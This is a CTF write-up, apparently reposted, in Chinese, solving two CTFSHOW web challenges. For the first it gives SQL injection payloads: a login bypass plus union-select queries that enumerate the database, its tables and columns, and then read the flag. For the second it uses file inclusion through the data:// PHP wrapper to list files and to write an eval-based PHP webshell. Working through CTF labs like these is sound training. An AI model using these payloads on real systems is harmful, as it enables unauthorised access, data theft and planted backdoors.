首页 > Web开发 > 详细

CTFSHOW的web部分writeup

时间:2020-09-20 00:11:44      阅读:168      评论:0      收藏:0      [点我收藏+]

WEB2

题目提示是简单的SQL注入,于是尝试输入点中使用万能密码:admin‘or 1=1#(CTF中SQL万能密码集合发现成功执行,于是

技术分享图片

order by查找回显数

username=ctfshow‘ order by 3 #&password=1

技术分享图片

技术分享图片


在3时正常回显,4是无回显,说明回显数为3
使用union select 联合查询爆库名

username=ctfshow‘ union select 1,database(),3#&password=1

技术分享图片

发现数据库是web2,继续爆表名:

username=ctfshow‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #&password=1

爆字段:

username=ctfshow‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘flag‘#&password=1

爆flag;

username=ctfshow‘ union select 1,group_concat(flag),3 from flag #&password=1

技术分享图片

web3

打开网站提示输入url,测试/etc/passwd成功显示,应为文件包含漏洞
技术分享图片
第一种方法:
php伪协议中的data通过通配符查找目录下的所有文件

==url=data://text/plain,<?php print_r(glob("*")); ?>==
技术分享图片
技术分享图片
得到 ctf_go_go_go
直接访问得flag

第二种方法:

写入一句话菜刀连接
==url=data:text/plain,<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[‘hack‘]);?>")?>==
技术分享图片
附:常见的php伪协议及用法:https://blog.csdn.net/yao_xin_de_yuan/article/details/108326427
技术分享图片

CTFSHOW的web部分writeup

原文:https://www.cnblogs.com/zw7889/p/13698196.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!